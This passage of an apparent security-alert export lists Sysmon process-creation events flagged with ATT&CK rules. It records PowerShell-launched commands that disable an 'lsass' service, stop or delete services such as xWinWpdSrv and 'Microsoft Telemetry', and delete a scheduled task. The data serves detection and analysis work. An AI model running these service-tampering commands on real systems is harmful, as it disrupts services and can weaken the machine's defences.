Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:52.387",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:23.709 +ProcessGuid: {df9fc3d3-b3cb-5ecf-0000-001048ce2a00} +ProcessId: 7500 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config lsass Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config lsass Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:23.712563600Z"",""eventRecordID"":""3110"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:23.709\r\nProcessGuid: {df9fc3d3-b3cb-5ecf-0000-001048ce2a00}\r\nProcessId: 7500\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config lsass Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:23.709"",""processGuid"":""{df9fc3d3-b3cb-5ecf-0000-001048ce2a00}"",""processId"":""7500"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config lsass Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:52.101",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:23.683 +ProcessGuid: {df9fc3d3-b3cb-5ecf-0000-00105acc2a00} +ProcessId: 1948 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Microsoft Telemetry"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:23.686042700Z"",""eventRecordID"":""3108"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:23.683\r\nProcessGuid: {df9fc3d3-b3cb-5ecf-0000-00105acc2a00}\r\nProcessId: 1948\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:23.683"",""processGuid"":""{df9fc3d3-b3cb-5ecf-0000-00105acc2a00}"",""processId"":""1948"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Microsoft Telemetry\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:52.032",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:23.646 +ProcessGuid: {df9fc3d3-b3cb-5ecf-0000-0010dac92a00} +ProcessId: 5660 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SVSHost +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:23.648268300Z"",""eventRecordID"":""3105"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:23.646\r\nProcessGuid: {df9fc3d3-b3cb-5ecf-0000-0010dac92a00}\r\nProcessId: 5660\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:23.646"",""processGuid"":""{df9fc3d3-b3cb-5ecf-0000-0010dac92a00}"",""processId"":""5660"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SVSHost"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:51.996",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:23.609 +ProcessGuid: {df9fc3d3-b3cb-5ecf-0000-0010dec72a00} +ProcessId: 7824 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete xWinWpdSrv 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete xWinWpdSrv",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:23.612159900Z"",""eventRecordID"":""3103"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:23.609\r\nProcessGuid: {df9fc3d3-b3cb-5ecf-0000-0010dec72a00}\r\nProcessId: 7824\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete xWinWpdSrv\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:23.609"",""processGuid"":""{df9fc3d3-b3cb-5ecf-0000-0010dec72a00}"",""processId"":""7824"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete xWinWpdSrv"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:51.984",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:23.587 +ProcessGuid: {df9fc3d3-b3cb-5ecf-0000-0010dfc62a00} +ProcessId: 3572 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop xWinWpdSrv +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:23.591070400Z"",""eventRecordID"":""3102"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:23.587\r\nProcessGuid: {df9fc3d3-b3cb-5ecf-0000-0010dfc62a00}\r\nProcessId: 3572\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:23.587"",""processGuid"":""{df9fc3d3-b3cb-5ecf-0000-0010dfc62a00}"",""processId"":""3572"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop xWinWpdSrv"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:30.636",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: 
+RuleName: +UtcTime: 2020-05-28 12:51:02.315 +ProcessGuid: {df9fc3d3-b3b6-5ecf-0000-00109c522700} +ProcessId: 2992 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ECDnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:02.319558600Z"",""eventRecordID"":""3089"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:02.315\r\nProcessGuid: {df9fc3d3-b3b6-5ecf-0000-00109c522700}\r\nProcessId: 2992\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating 
System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:02.315"",""processGuid"":""{df9fc3d3-b3b6-5ecf-0000-00109c522700}"",""processId"":""2992"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ECDnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
